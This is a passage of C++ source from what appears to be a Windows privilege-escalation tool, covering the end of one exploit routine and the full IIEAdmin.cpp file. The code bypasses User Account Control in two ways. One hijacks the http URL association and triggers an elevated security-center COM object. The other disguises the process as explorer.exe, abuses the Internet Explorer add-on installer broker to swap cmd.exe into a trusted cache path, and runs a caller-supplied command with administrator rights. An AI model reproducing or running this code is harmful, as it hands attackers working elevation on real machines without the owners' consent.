LOAD_LIBRARY_SEARCH_SYSTEM32); 260 | if (!hModule) 261 | { 262 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 263 | CoUninitialize(); 264 | std::wcout << L"LoadLibraryExW() failed. Error: " << GetLastError() << std::endl; 265 | return EXIT_FAILURE; 266 | } 267 | 268 | const auto UserAssocSetInternal = LocateSignature( 269 | SIGNATURE_NT10, sizeof SIGNATURE_NT10, ".text", hModule); 270 | if (!UserAssocSetInternal) 271 | { 272 | FreeLibrary(hModule); 273 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 274 | CoUninitialize(); 275 | std::wcout << L"SystemSettings.Handlers.dll!UserAssocSet->\"Internal\" not found.\n"; 276 | return EXIT_FAILURE; 277 | } 278 | 279 | hr = UserAssocSetInternal(nullptr, L"http", L"scareing", 1); 280 | FreeLibrary(hModule); 281 | if (FAILED(hr)) 282 | { 283 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 284 | CoUninitialize(); 285 | std::wcout << 286 | L"SystemSettings.Handlers.dll!UserAssocSet->\"Internal\" did not return S_OK. Return value -> HRESULT 0x" 287 | << std::hex << hr << std::endl; 288 | return EXIT_FAILURE; 289 | } 290 | } 291 | else if (osMajorVersion == 6 && (osMinorVersion == 2 || osMinorVersion == 3)) 292 | { 293 | const auto hModule = LoadLibraryExW(L"shell32.dll", nullptr, LOAD_LIBRARY_SEARCH_SYSTEM32); 294 | if (!hModule) 295 | { 296 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 297 | CoUninitialize(); 298 | std::wcout << L"LoadLibraryExW() failed. Error: " << GetLastError() << std::endl; 299 | return EXIT_FAILURE; 300 | } 301 | 302 | const auto UserAssocSet = LocateSignature(SIGNATURE_NT6X, sizeof SIGNATURE_NT6X, ".text", 303 | hModule); 304 | if (!UserAssocSet) 305 | { 306 | FreeLibrary(hModule); 307 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 308 | CoUninitialize(); 309 | std::wcout << L"shell32.dll!UserAssocSet not found.\n"; 310 | return EXIT_FAILURE; 311 | } 312 | 313 | UserAssocSet(2, L"http", L"scareing"); 314 | FreeLibrary(hModule); 315 | } 316 | else if (osMajorVersion == 6 && osMinorVersion == 1) 317 | { 318 | auto status = RegSetKeyValueW( 319 | HKEY_CURRENT_USER, L"SOFTWARE\\Microsoft\\Windows\\Shell\\Associations\\UrlAssociations\\http\\UserChoice", 320 | L"ProgId", REG_SZ, L"scareing", sizeof(L"scareing")); 321 | if (status) 322 | { 323 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 324 | CoUninitialize(); 325 | std::wcout << L"RegSetKeyValueW() failed. LSTATUS: " << status << std::endl; 326 | return EXIT_FAILURE; 327 | } 328 | } 329 | 330 | BIND_OPTS3 bind{}; 331 | bind.cbStruct = sizeof BIND_OPTS3; 332 | bind.dwClassContext = CLSCTX_LOCAL_SERVER; 333 | 334 | IWscAdmin* wscAdmin; 335 | hr = CoGetObject(L"Elevation:Administrator!new:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}", &bind, IID_IWscAdmin, 336 | reinterpret_cast(&wscAdmin)); 337 | if (FAILED(hr)) 338 | { 339 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 340 | CoUninitialize(); 341 | std::wcout << L"CoGetObject() failed. HRESULT: 0x" << std::hex << hr << std::endl; 342 | return EXIT_FAILURE; 343 | } 344 | 345 | hr = wscAdmin->Initialize(); 346 | if (FAILED(hr)) 347 | { 348 | wscAdmin->Release(); 349 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 350 | CoUninitialize(); 351 | std::wcout << L"CWscAdmin::Initialize() failed. HRESULT: 0x" << std::hex << std::endl; 352 | return EXIT_FAILURE; 353 | } 354 | 355 | hr = wscAdmin->DoModalSecurityAction(nullptr, 103, 0); 356 | /* Sleep for one second to allow the action to happen, otherwise we'll delete the registry key before it has 357 | * a chance to read and use it. It's because this action happens async. in another process. I know, its strange 358 | * but that's how it is. */ 359 | Sleep(1000); 360 | wscAdmin->Release(); 361 | RegDeleteTreeW(HKEY_CURRENT_USER, L"SOFTWARE\\Classes\\scareing"); 362 | CoUninitialize(); 363 | if (FAILED(hr)) 364 | { 365 | std::wcout << L"CWscAdmin::DoModalSecurityAction() failed. HRESULT: 0x" << std::hex << hr << std::endl; 366 | return EXIT_FAILURE; 367 | } 368 | 369 | SetConsoleTextAttribute(hConsole, 14); 370 | std::wcout << L"["; 371 | SetConsoleTextAttribute(hConsole, 15); 372 | std::wcout << L"~"; 373 | SetConsoleTextAttribute(hConsole, 14); 374 | std::wcout << L"] *** Exploit successful.\n\n"; 375 | SetConsoleTextAttribute(hConsole, 7); 376 | 377 | return 0; 378 | } 379 | -------------------------------------------------------------------------------- /IIEAdmin.cpp: -------------------------------------------------------------------------------- 1 | #include "IIEAdmin.h" 2 | 3 | 4 | #pragma region NT Stuff 5 | typedef struct _UNICODE_STRING 6 | { 7 | unsigned short Length; 8 | unsigned short MaximumLength; 9 | long Padding_8; 10 | wchar_t* Buffer; 11 | } UNICODE_STRING, * PUNICODE_STRING; 12 | 13 | typedef struct _CURDIR 14 | { 15 | struct _UNICODE_STRING DosPath; 16 | void* Handle; 17 | } CURDIR, * PCURDIR; 18 | 19 | typedef struct _STRING 20 | { 21 | unsigned short Length; 22 | unsigned short MaximumLength; 23 | long Padding_94; 24 | char* Buffer; 25 | } STRING, * PSTRING; 26 | 27 | typedef struct _RTL_DRIVE_LETTER_CURDIR 28 | { 29 | unsigned short Flags; 30 | unsigned short Length; 31 | unsigned long TimeStamp; 32 | struct _STRING DosPath; 33 | } RTL_DRIVE_LETTER_CURDIR, * PRTL_DRIVE_LETTER_CURDIR; 34 | 35 | typedef struct _RTL_USER_PROCESS_PARAMETERS 36 | { 37 | unsigned long MaximumLength; 38 | unsigned long Length; 39 | unsigned long Flags; 40 | unsigned long DebugFlags; 41 | void* ConsoleHandle; 42 | unsigned long ConsoleFlags; 43 | long Padding_95; 44 | void* StandardInput; 45 | void* StandardOutput; 46 | void* StandardError; 47 | struct _CURDIR CurrentDirectory; 48 | struct _UNICODE_STRING DllPath; 49 | struct _UNICODE_STRING ImagePathName; 50 | struct _UNICODE_STRING CommandLine; 51 | void* Environment; 52 | unsigned long StartingX; 53 | unsigned long StartingY; 54 | unsigned long CountX; 55 | unsigned long CountY; 56 | unsigned long CountCharsX; 57 | unsigned long CountCharsY; 58 | unsigned long FillAttribute; 59 | unsigned long WindowFlags; 60 | unsigned long ShowWindowFlags; 61 | long Padding_96; 62 | struct _UNICODE_STRING WindowTitle; 63 | struct _UNICODE_STRING DesktopInfo; 64 | struct _UNICODE_STRING ShellInfo; 65 | struct _UNICODE_STRING RuntimeData; 66 | struct _RTL_DRIVE_LETTER_CURDIR CurrentDirectores[32]; 67 | unsigned __int64 EnvironmentSize; 68 | unsigned __int64 EnvironmentVersion; 69 | void* PackageDependencyData; 70 | unsigned long ProcessGroupId; 71 | unsigned long LoaderThreads; 72 | struct _UNICODE_STRING RedirectionDllName; 73 | struct _UNICODE_STRING HeapPartitionName; 74 | unsigned __int64* DefaultThreadpoolCpuSetMasks; 75 | unsigned long DefaultThreadpoolCpuSetMaskCount; 76 | long __PADDING__[1]; 77 | } RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS; 78 | 79 | constexpr auto PEB_OFFSET = 0x60ULL; 80 | constexpr auto PROCESS_PARAM_OFFSET = 0x20ULL; 81 | constexpr auto BASENAME_OFFSET = 0x58ULL; 82 | constexpr auto FULLNAME_OFFSET = 0x48ULL; 83 | constexpr auto DLL_BASE_OFFSET = 0x30ULL; 84 | #pragma endregion 85 | 86 | using RtlInitUnicodeStringPtr = void(NTAPI*)(PUNICODE_STRING, PCWSTR); 87 | using LDR_ENUM_CALLBACK = void(NTAPI*)(PVOID, PVOID, PBOOLEAN); 88 | using LdrEnumerateLoadedModulesPtr = NTSTATUS(NTAPI*)(ULONG, LDR_ENUM_CALLBACK, PVOID); 89 | 90 | struct LDR_CALLBACK_PARAMS 91 | { 92 | PCWCHAR ExplorerPath; 93 | PVOID ImageBase; 94 | RtlInitUnicodeStringPtr RtlInitUnicodeString; 95 | }; 96 | 97 | void ForgeProcessInformation(PCWCHAR explorerPath, const RtlInitUnicodeStringPtr RtlInitUnicodeString, 98 | const LdrEnumerateLoadedModulesPtr LdrEnumerateLoadedModules) 99 | { 100 | auto* const pPeb = *reinterpret_cast(reinterpret_cast(NtCurrentTeb()) + PEB_OFFSET); 101 | auto* pProcessParams = *reinterpret_cast(pPeb + PROCESS_PARAM_OFFSET); 102 | 103 | RtlInitUnicodeString(&pProcessParams->ImagePathName, explorerPath); 104 | RtlInitUnicodeString(&pProcessParams->CommandLine, L"explorer.exe"); 105 | 106 | LDR_CALLBACK_PARAMS params{ explorerPath, GetModuleHandleW(nullptr), RtlInitUnicodeString }; 107 | 108 | LdrEnumerateLoadedModules(0, [](PVOID ldrEntry, PVOID context, PBOOLEAN stop) 109 | { 110 | auto* params = static_cast(context); 111 | 112 | if (*reinterpret_cast(reinterpret_cast(ldrEntry) + DLL_BASE_OFFSET) == reinterpret_cast< 113 | ULONG_PTR>(params->ImageBase)) 114 | { 115 | const auto baseName = reinterpret_cast(static_cast(ldrEntry) + BASENAME_OFFSET), 116 | fullName = reinterpret_cast(static_cast(ldrEntry) + FULLNAME_OFFSET); 117 | 118 | params->RtlInitUnicodeString(baseName, L"explorer.exe"); 119 | params->RtlInitUnicodeString(fullName, params->ExplorerPath); 120 | 121 | *stop = TRUE; 122 | } 123 | }, reinterpret_cast(¶ms)); 124 | } 125 | 126 | struct IIEAdminBrokerObjectForAdminInstaller : IUnknown 127 | { 128 | /** 129 | * \brief Creates the CActiveXInstallBroker object used by CIEAdminBrokerObject and sets the internal state flag to 1. 130 | * \param providerName Name of the installer provider to be stored in the object instance. 131 | * \param unknown0 Some other thing stored in the object instance. 132 | * \param instanceUuid A unique UUID for this installer session. This must be passed to all methods called in CIEAdminBrokerObject. 133 | * \return Standard HRESULT value. 134 | */ 135 | virtual HRESULT InitializeAdminInstaller( 136 | BSTR providerName, 137 | int unknown0, 138 | BSTR* instanceUuid 139 | ) = 0; 140 | }; 141 | 142 | const GUID IID_IeAxiAdminInstaller = { 0x9AEA8A59, 0xE0C9, 0x40F1, {0x87, 0xDD, 0x75, 0x70, 0x61, 0xD5, 0x61, 0x77} }; 143 | 144 | struct IIEAdminBrokerObjectForInstaller2 : IUnknown 145 | { 146 | /** 147 | * \brief Authorizes a file for execution via RunSetupCommand. WinVerifyTrust is called to check the embedded certificate in the 148 | * specified file, and if it passes the check, the internal state flag is set to 2, allowing us to use RunSetupCommand. Then, the file 149 | * is copied into the installer cache directory with a new name. The path for this new file is given to us. 150 | * \param instanceUuid The installer's instance UUID. 151 | * \param verifyParentWindow The window to use for WinVerifyTrust. 152 | * \param unknown0 Needs to be same as 'fileName' parameter. 153 | * \param fileName The file that contains the embedded certificate which we want to verify. 154 | * \param unknown1 Some unknown parameter. 155 | * \param uiChoice The uiChoice member for the WINTRUST_DATA struct used by WinVerifyTrust. 156 | * \param uiContext The uiContext member for the WINTRUST_DATA struct used by WinVerifyTrust. 157 | * \param unknown2 Some interface ID, I just passed in IID_IUnknown. Purpose is unknown. 158 | * \param verifiedFileName The path for the verified file which has been copied into the installer cache directory. 159 | * \param unknown3 Some unknown parameter. [UACME says it's the file's certificate details...] 160 | * \param unknown4 Some unknown parameter. [UACME says it's the file's certificate detail's length/size...] 161 | * \return Standard HRESULT value. 162 | */ 163 | virtual HRESULT VerifyFile( 164 | BSTR instanceUuid, 165 | HWND verifyParentWindow, 166 | BSTR unknown0, 167 | BSTR fileName, 168 | BSTR unknown1, 169 | ULONG uiChoice, 170 | ULONG uiContext, 171 | REFGUID unknown2, 172 | BSTR* verifiedFileName, 173 | PULONG unknown3, 174 | PUCHAR* unknown4 175 | ) = 0; 176 | 177 | /** 178 | * \brief Executes the specified command line. The command line must be a command line of the file path given to us by 179 | * VerifyFile. Otherwise, the function returns E_ACCESSDENIED. If the command line uses a path as one of the parameters to the 180 | * executable, the backslashes must be forward slashes, otherwise E_ACCESSDENIED is returned as well (probably because the command line 181 | * path check fails if a backslash is found after the main executable path). This function basically calls IEAdvpack.dll!RunSetupCommandW. 182 | * \param instanceUuid The installer's instance UUID. 183 | * \param parentWindow The parent window to use for IEAdvpack.dll!RunSetupCommandW. 184 | * \param commandLine The command line to execute. 185 | * \param infSection The infSection specification for IEAdvpack.dll!RunSetupCommandW. 186 | * \param workingDirectory The working directory of the process to be launched. 187 | * \param title The title to use for IEAdvPack.dll!RunSetupCommandW. 188 | * \param flags A set of flags which tell IEAdvpack.dll!RunSetupCommandW how to handle the setup process: either launch the installer 189 | * directly or perform an inf-based core install. 190 | * \param exeHandle A handle to the launched installer, but this will always be NULL in our case. 191 | * \return E_INVALIDARG on exploit success, otherwise some other unexpected HRESULT value. 192 | */ 193 | virtual HRESULT RunSetupCommand( 194 | BSTR instanceUuid, 195 | HWND parentWindow, 196 | BSTR commandLine, 197 | BSTR infSection, 198 | BSTR workingDirectory, 199 | BSTR title, 200 | ULONG flags, 201 | PHANDLE exeHandle 202 | ) = 0; 203 | }; 204 | 205 | const GUID IID_IeAxiInstaller2 = { 0xBC0EC710, 0xA3ED, 0x4F99, {0xB1, 0x4F, 0x5F, 0xD5, 0x9F, 0xDA, 0xCE, 0xA3} }; 206 | 207 | int IIEAdmin(char* arg) 208 | { 209 | char* secret = arg; 210 | const auto hStdOutput = GetStdHandle(STD_OUTPUT_HANDLE); 211 | 212 | 213 | PWSTR windowsPath, systemPath; 214 | auto hr = SHGetKnownFolderPath(FOLDERID_Windows, 0, nullptr, &windowsPath); 215 | if (FAILED(hr)) 216 | { 217 | std::wcout << L"SHGetKnownFolderPath() (0) failed. HRESULT: 0x" << std::hex << hr << std::endl; 218 | return EXIT_FAILURE; 219 | } 220 | hr = SHGetKnownFolderPath(FOLDERID_System, 0, nullptr, &systemPath); 221 | if (FAILED(hr)) 222 | { 223 | CoTaskMemFree(windowsPath); 224 | std::wcout << L"SHGetKnownFolderPath() (1) failed. HRESULT: 0x" << std::hex << hr << std::endl; 225 | return EXIT_FAILURE; 226 | } 227 | 228 | std::wstring explorer{ windowsPath }, system32{ systemPath }; 229 | CoTaskMemFree(windowsPath); 230 | CoTaskMemFree(systemPath); 231 | explorer += L"\\explorer.exe"; 232 | 233 | const auto RtlInitUnicodeString = reinterpret_cast(GetProcAddress( 234 | GetModuleHandleW(L"ntdll.dll"), "RtlInitUnicodeString")); 235 | const auto LdrEnumerateLoadedModules = reinterpret_cast(GetProcAddress( 236 | GetModuleHandleW(L"ntdll.dll"), "LdrEnumerateLoadedModules")); 237 | 238 | ForgeProcessInformation(explorer.c_str(), RtlInitUnicodeString, LdrEnumerateLoadedModules); 239 | 240 | hr = CoInitializeEx(nullptr, COINIT_APARTMENTTHREADED | COINIT_DISABLE_OLE1DDE | COINIT_SPEED_OVER_MEMORY); 241 | if (FAILED(hr)) 242 | { 243 | std::wcout << L"CoInitializeEx() failed. HRESULT: 0x" << std::hex << hr << std::endl; 244 | return EXIT_FAILURE; 245 | } 246 | // because ieinstal.exe calls CoImpersonateClient during VerifyFile, we need this call so VerifyFile can succeed. 247 | hr = CoInitializeSecurity(nullptr, -1, nullptr, nullptr, RPC_C_AUTHN_LEVEL_CONNECT, RPC_C_IMP_LEVEL_IMPERSONATE, 248 | nullptr, 0, nullptr); 249 | if (FAILED(hr)) 250 | { 251 | std::wcout << L"CoInitializeSecurity() failed. HRESULT: 0x" << std::hex << hr << std::endl; 252 | CoUninitialize(); 253 | return EXIT_FAILURE; 254 | } 255 | 256 | IFileOperation* fileOperation; 257 | IIEAdminBrokerObjectForAdminInstaller* adminInstaller; 258 | BIND_OPTS3 bindOptions{}; 259 | 260 | bindOptions.dwClassContext = CLSCTX_LOCAL_SERVER; 261 | bindOptions.cbStruct = sizeof BIND_OPTS3; 262 | 263 | hr = CoGetObject(L"Elevation:Administrator!new:{3AD05575-8857-4850-9277-11B85BDB8E09}", &bindOptions, 264 | IID_IFileOperation, 265 | reinterpret_cast(&fileOperation)); 266 | if (FAILED(hr)) 267 | { 268 | CoUninitialize(); 269 | std::wcout << L"CoGetObject() (0) failed. HRESULT: 0x" << std::hex << hr << std::endl; 270 | return EXIT_FAILURE; 271 | } 272 | // create an instance of an interface (IeAxiAdminInstaller) from the Internet Explorer Add-on installer coclass. 273 | hr = CoGetObject(L"Elevation:Administrator!new:{BDB57FF2-79B9-4205-9447-F5FE85F37312}", &bindOptions, 274 | IID_IeAxiAdminInstaller, 275 | reinterpret_cast(&adminInstaller)); 276 | if (FAILED(hr)) 277 | { 278 | fileOperation->Release(); 279 | CoUninitialize(); 280 | std::wcout << L"CoGetObject() (1) failed. HRESULT: 0x" << std::hex << hr << std::endl; 281 | return EXIT_FAILURE; 282 | } 283 | 284 | // you'll see why we need IFileOperation later. 285 | hr = fileOperation-> 286 | SetOperationFlags(FOF_NOCONFIRMATION | FOFX_NOCOPYHOOKS | FOFX_REQUIREELEVATION | FOF_NOERRORUI); 287 | if (FAILED(hr)) 288 | { 289 | adminInstaller->Release(); 290 | fileOperation->Release(); 291 | CoUninitialize(); 292 | std::wcout << L"IFileOperation::SetOperationFlags() failed. HRESULT: 0x" << std::hex << hr << std::endl; 293 | return EXIT_FAILURE; 294 | } 295 | 296 | /* this is the target file with the embedded certificate which will pass the WinVerifyTrust call from VerifyFile 297 | * we will be using. */ 298 | system32 += L"\\bdeunlock.exe"; 299 | 300 | /* 301 | * Begin ieinstal.exe -> CIEAdminBrokerObject::CActiveXInstallBroker 302 | */ 303 | 304 | BSTR instanceUuid; 305 | 306 | hr = adminInstaller->InitializeAdminInstaller(nullptr, 0, &instanceUuid); 307 | if (FAILED(hr)) 308 | { 309 | adminInstaller->Release(); 310 | fileOperation->Release(); 311 | CoUninitialize(); 312 | std::wcout << L"ieinstal.exe -> CIEAdminBrokerObject::InitializeAdminInstaller() failed. HRESULT: 0x" << 313 | std::hex << hr << std::endl; 314 | return EXIT_FAILURE; 315 | } 316 | 317 | IIEAdminBrokerObjectForInstaller2* installer2; 318 | 319 | // get the IeAxiInstaller2 interface from the IeAxiAdminInstaller interface. 320 | hr = adminInstaller->QueryInterface(IID_IeAxiInstaller2, reinterpret_cast(&installer2)); 321 | if (FAILED(hr)) 322 | { 323 | SysFreeString(instanceUuid); 324 | adminInstaller->Release(); 325 | fileOperation->Release(); 326 | CoUninitialize(); 327 | std::wcout << L"ieinstal.exe -> CIEAdminBrokerObject::QueryInterface() failed. HRESULT: 0x" << 328 | std::hex << hr << std::endl; 329 | return EXIT_FAILURE; 330 | } 331 | 332 | auto* const fileName = SysAllocString(system32.c_str()); 333 | BSTR targetFile; 334 | ULONG unknown5; 335 | PUCHAR unknown6; 336 | 337 | /* 338 | * HWND is INVALID_HANDLE_VALUE: see documentation of WinVerifyTrust. 339 | */ 340 | hr = installer2->VerifyFile(instanceUuid, static_cast(INVALID_HANDLE_VALUE), fileName, fileName, nullptr, 341 | WTD_UI_NONE, WTD_UICONTEXT_EXECUTE, IID_IUnknown, &targetFile, &unknown5, &unknown6); 342 | SysFreeString(fileName); 343 | if (FAILED(hr)) 344 | { 345 | SysFreeString(instanceUuid); 346 | installer2->Release(); 347 | adminInstaller->Release(); 348 | fileOperation->Release(); 349 | CoUninitialize(); 350 | std::wcout << L"ieinstal.exe -> CIEAdminBrokerObject::VerifyFile() failed. HRESULT: 0x" << 351 | std::hex << hr << std::endl; 352 | return EXIT_FAILURE; 353 | } 354 | 355 | /* 356 | * Replace the file in the installer cache with cmd.exe First we will copy cmd.exe to the current directory, then rename it the 357 | * same name as the file in the cache. Then we will use an elevated IFileOperation instance to delete the file in the cache and 358 | * copy our renamed cmd.exe into there. This will allow us to successfully execute RunSetupCommand and it will launch our cmd.exe 359 | * in the cache directory. 360 | */ 361 | 362 | WCHAR file[25], directory[MAX_PATH - 2], drive[3], fullPath[MAX_PATH]{}; 363 | 364 | _wsplitpath_s(targetFile, drive, sizeof drive / sizeof(WCHAR), directory, sizeof directory / sizeof(WCHAR), file, 365 | sizeof file / sizeof(WCHAR), nullptr, 0); 366 | wcscat_s(file, sizeof file / sizeof(WCHAR), L".exe"); 367 | wcscat_s(fullPath, sizeof fullPath / sizeof(WCHAR), drive); 368 | wcscat_s(fullPath, sizeof fullPath / sizeof(WCHAR), directory); 369 | 370 | CoTaskMemFree(unknown6); 371 | 372 | IShellItem* existingItem, * parentFolder, * newItem; 373 | 374 | system32 = system32.substr(0, system32.find(L"\\bdeunlock.exe")); 375 | system32 += L"\\cmd.exe"; 376 | if (!CopyFileW(system32.c_str(), file, FALSE)) 377 | { 378 | std::wcout << L"CopyFileW() failed. Error: " << GetLastError() << std::endl; 379 | SysFreeString(targetFile); 380 | SysFreeString(instanceUuid); 381 | installer2->Release(); 382 | adminInstaller->Release(); 383 | fileOperation->Release(); 384 | CoUninitialize(); 385 | return EXIT_FAILURE; 386 | } 387 | 388 | const auto requiredSize = static_cast(GetCurrentDirectoryW(0, nullptr)) + wcslen(file) + 1; 389 | auto* currentDirectory = new WCHAR[requiredSize]; 390 | GetCurrentDirectoryW(static_cast(requiredSize), currentDirectory); 391 | wcscat_s(currentDirectory, requiredSize, L"\\"); 392 | wcscat_s(currentDirectory, requiredSize, file); 393 | 394 | hr = SHCreateItemFromParsingName(currentDirectory, nullptr, IID_IShellItem, reinterpret_cast(&newItem)); 395 | delete[] currentDirectory; 396 | if (FAILED(hr)) 397 | { 398 | DeleteFileW(file); 399 | SysFreeString(targetFile); 400 | SysFreeString(instanceUuid); 401 | installer2->Release(); 402 | adminInstaller->Release(); 403 | fileOperation->Release(); 404 | CoUninitialize(); 405 | std::wcout << L"SHCreateItemFromParsingName() (0) failed. HRESULT: 0x" << std::hex << hr << std::endl; 406 | return EXIT_FAILURE; 407 | } 408 | hr = SHCreateItemFromParsingName(targetFile, nullptr, IID_IShellItem, reinterpret_cast(&existingItem)); 409 | if (FAILED(hr)) 410 | { 411 | newItem->Release(); 412 | DeleteFileW(file); 413 | SysFreeString(targetFile); 414 | SysFreeString(instanceUuid); 415 | installer2->Release(); 416 | adminInstaller->Release(); 417 | fileOperation->Release(); 418 | CoUninitialize(); 419 | std::wcout << L"SHCreateItemFromParsingName() (1) failed. HRESULT: 0x" << std::hex << hr << std::endl; 420 | return EXIT_FAILURE; 421 | } 422 | hr = SHCreateItemFromParsingName(fullPath, nullptr, IID_IShellItem, reinterpret_cast(&parentFolder)); 423 | if (FAILED(hr)) 424 | { 425 | existingItem->Release(); 426 | newItem->Release(); 427 | DeleteFileW(file); 428 | SysFreeString(targetFile); 429 | SysFreeString(instanceUuid); 430 | installer2->Release(); 431 | adminInstaller->Release(); 432 | fileOperation->Release(); 433 | CoUninitialize(); 434 | std::wcout << L"SHCreateItemFromParsingName() (2) failed. HRESULT: 0x" << std::hex << hr << std::endl; 435 | return EXIT_FAILURE; 436 | } 437 | 438 | hr = fileOperation->DeleteItem(existingItem, nullptr); 439 | if (FAILED(hr)) 440 | { 441 | parentFolder->Release(); 442 | existingItem->Release(); 443 | newItem->Release(); 444 | DeleteFileW(file); 445 | SysFreeString(targetFile); 446 | SysFreeString(instanceUuid); 447 | installer2->Release(); 448 | adminInstaller->Release(); 449 | fileOperation->Release(); 450 | CoUninitialize(); 451 | std::wcout << L"IFileOperation::DeleteItem() failed. HRESULT: 0x" << std::hex << hr << std::endl; 452 | return EXIT_FAILURE; 453 | } 454 | hr = fileOperation->MoveItem(newItem, parentFolder, nullptr, nullptr); 455 | if (FAILED(hr)) 456 | { 457 | parentFolder->Release(); 458 | existingItem->Release(); 459 | newItem->Release(); 460 | DeleteFileW(file); 461 | SysFreeString(targetFile); 462 | SysFreeString(instanceUuid); 463 | installer2->Release(); 464 | adminInstaller->Release(); 465 | fileOperation->Release(); 466 | CoUninitialize(); 467 | std::wcout << L"IFileOperation::MoveItem() failed. HRESULT: 0x" << std::hex << hr << std::endl; 468 | return EXIT_FAILURE; 469 | } 470 | hr = fileOperation->PerformOperations(); 471 | parentFolder->Release(); 472 | existingItem->Release(); 473 | newItem->Release(); 474 | fileOperation->Release(); 475 | DeleteFileW(file); 476 | if (FAILED(hr)) 477 | { 478 | SysFreeString(targetFile); 479 | SysFreeString(instanceUuid); 480 | installer2->Release(); 481 | adminInstaller->Release(); 482 | CoUninitialize(); 483 | std::wcout << L"IFileOperation::PerformOperations() failed. HRESULT: 0x" << std::hex << hr << std::endl; 484 | return EXIT_FAILURE; 485 | } 486 | 487 | system32 = system32.substr(0, system32.find(L"\\cmd.exe")); 488 | auto* const workingDirectory = SysAllocString(system32.c_str()); 489 | 490 | std::wstring commandLine{ targetFile }; 491 | /* 492 | * Launch a new instance of cmd.exe and exit out of the old one. We do this because if we use the copied cmd.exe directly, 493 | * there are lots of error messages and broken messages because we did not copy the language dependencies along with cmd.exe 494 | * into the installer's cache directory. 495 | */ 496 | bstr_t b(secret); 497 | WCHAR* x = b; 498 | commandLine += L" /C "; 499 | commandLine += x; 500 | SysFreeString(targetFile); 501 | targetFile = SysAllocString(commandLine.c_str()); 502 | 503 | HANDLE exeHandle; 504 | /* 505 | * 'infSection' and 'title' are not used in our case, because flags are 0: we are doing a direct launch of the installer 506 | * process. However, we get an access violation if they are NULL, so just set them to our empty string pointers. They will 507 | * show up as L'\0' in ieinstal.exe anyways (because they are not SysAlloc'ed() strings). 508 | */ 509 | hr = installer2->RunSetupCommand(instanceUuid, nullptr, targetFile, const_cast(L""), workingDirectory, 510 | const_cast(L""), 0, &exeHandle); 511 | SysFreeString(workingDirectory); 512 | SysFreeString(targetFile); 513 | SysFreeString(instanceUuid); 514 | installer2->Release(); 515 | adminInstaller->Release(); 516 | CoUninitialize(); 517 | if (hr != E_INVALIDARG) 518 | std::wcout << 519 | L"ieinstal.exe -> CIEAdminBrokerObject::RunSetupCommand() did not return the expected value (E_INVALIDARG).\n"; 520 | 521 | /* 522 | * End ieinstal.exe -> CIEAdminBrokerObject::CActiveXInstallBroker 523 | */ 524 | 525 | SetConsoleTextAttribute(hStdOutput, 14); 526 | std::wcout << L"["; 527 | SetConsoleTextAttribute(hStdOutput, 15); 528 | std::wcout << L"@"; 529 | SetConsoleTextAttribute(hStdOutput, 14); 530 | std::wcout << L"] "; 531 | SetConsoleTextAttribute(hStdOutput, 14); 532 | std::wcout << L"*** Exploit successful.\n\n"; 533 | SetConsoleTextAttribute(hStdOutput, 7); 534 | 535 | return 0; 536 | } 537 | --------------------------------------------------------------------------------